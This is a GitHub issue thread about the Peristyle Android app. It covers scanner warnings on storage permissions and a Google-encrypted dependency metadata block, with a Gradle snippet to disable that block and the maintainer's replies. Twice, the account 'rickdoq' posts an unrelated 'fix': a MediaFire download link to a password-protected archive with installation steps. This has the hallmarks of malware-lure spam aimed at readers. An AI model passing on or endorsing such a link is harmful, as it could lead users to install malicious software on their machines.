### ISSUE TITLE
question on permissions

### ISSUE THREAD

**Issue by IzzySoft** [Hamza417/Peristyle#68]
With today's update, the scanners at IoD threw a warning:

```
! repo/app.simple.peri_152.apk declares sensitive permission(s): android.permission.MANAGE_EXTERNAL_STORAGE android.permission.READ_EXTERNAL_STORAGE
! repo/app.simple.peri_152.apk contains signature block blobs: 0x504b4453 (DEPENDENCY_INFO_BLOCK; GOOGLE)
```

As for `MANAGE_EXTERNAL_STORAGE` I found #42 – I guess `READ_EXTERNAL_STORAGE` is related to that?

Concerning `DEPENDENCY_INFO_BLOCK`, that can easily be avoided with a minor addition to your `build.gradle`:

```gradle
android {
    dependenciesInfo {
        // Disables dependency metadata when building APKs.
        includeInApk = false
        // Disables dependency metadata when building Android App Bundles.
        includeInBundle = false
    }
}
```

For some background: that BLOB is supposed to be just a binary representation of your app's dependency tree. But as it's encrypted with a public key belonging to Google, only Google can read it – and nobody else can even verify what it really contains. More details can be found e.g. here: [Ramping up security: additional APK checks are in place with the IzzyOnDroid repo](https://android.izzysoft.de/articles/named/iod-scan-apkchecks#blobs).

Thanks in advance!

**Comment by Hamza417** [comment]
Yeah, the permissions are solely used for accessing the current wallpaper of the device, more reference can be [found here](https://developer.android.com/reference/android/app/WallpaperManager#getDrawable()). It's weird how it works, granting whole file system access just for getting the wallpaper from the system.

As for dependency block, I didn't know about that, I'll disable it.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Hamza417** [comment]
> hi bro, to fix your trouble try this fix, i see it in another issue, https://app.mediafire.com/dqajf1x14ccfd password: changeme when you installing it, you need to place a check in install to path and select usx

I had already fixed it...

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by IzzySoft** [comment]
> It's weird how it works

That's a problem with several permissions (think e.g. of location permissions if you need bluetooth). And indeed, granting `MANAGE_EXTERNAL_STORAGE` just to access the current wallpaper seems quite excessive. There are exclusive permissions to `SET_WALLPAPER*` – so one can only wonder why there's no `GET_WALLPAPER*`…

> As for dependency block, I didn't know about that, I'll disable it.

Thanks a lot! I've meanwhile added both permissions to the green list (already in effect).
